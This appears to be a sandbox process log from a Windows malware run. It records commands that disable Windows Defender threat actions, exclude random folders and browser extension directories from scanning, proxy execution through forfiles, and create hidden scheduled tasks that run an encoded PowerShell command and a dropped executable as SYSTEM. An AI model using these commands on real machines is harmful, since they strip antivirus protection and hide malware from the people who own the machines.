/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FaFtrxulSluCDxNNaBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FaFtrxulSluCDxNNaBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NtKBDVlqGeDOC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NtKBDVlqGeDOC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fWKfJhFBpXaU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fWKfJhFBpXaU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tEtgnFrpU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tEtgnFrpU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yFrevNMMqpUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yFrevNMMqpUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CELjwRpaQUihTHVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CELjwRpaQUihTHVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\czNdcoQbAIHbcVqnf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\czNdcoQbAIHbcVqnf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OcEEzUIRowZikmev\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OcEEzUIRowZikmev\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FaFtrxulSluCDxNNaBR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FaFtrxulSluCDxNNaBR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FaFtrxulSluCDxNNaBR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NtKBDVlqGeDOC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NtKBDVlqGeDOC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fWKfJhFBpXaU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fWKfJhFBpXaU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tEtgnFrpU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tEtgnFrpU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yFrevNMMqpUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yFrevNMMqpUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CELjwRpaQUihTHVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CELjwRpaQUihTHVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\czNdcoQbAIHbcVqnf /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\czNdcoQbAIHbcVqnf /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OcEEzUIRowZikmev /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OcEEzUIRowZikmev /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gZmAJARaH" /SC once /ST 01:30:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gZmAJARaH"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gZmAJARaH"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "HovMjXmPFmPaOitfx" /SC once /ST 01:33:05 /RU "SYSTEM" /TR "\"C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe\" Qa /mnYTdidkY 385107 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "HovMjXmPFmPaOitfx"
C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe
C:\Windows\Temp\OcEEzUIRowZikmev\embmWUNWsBbOvWT\vUEGxZC.exe Qa /mnYTdidkY 385107 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3692 -ip 3692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 812
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
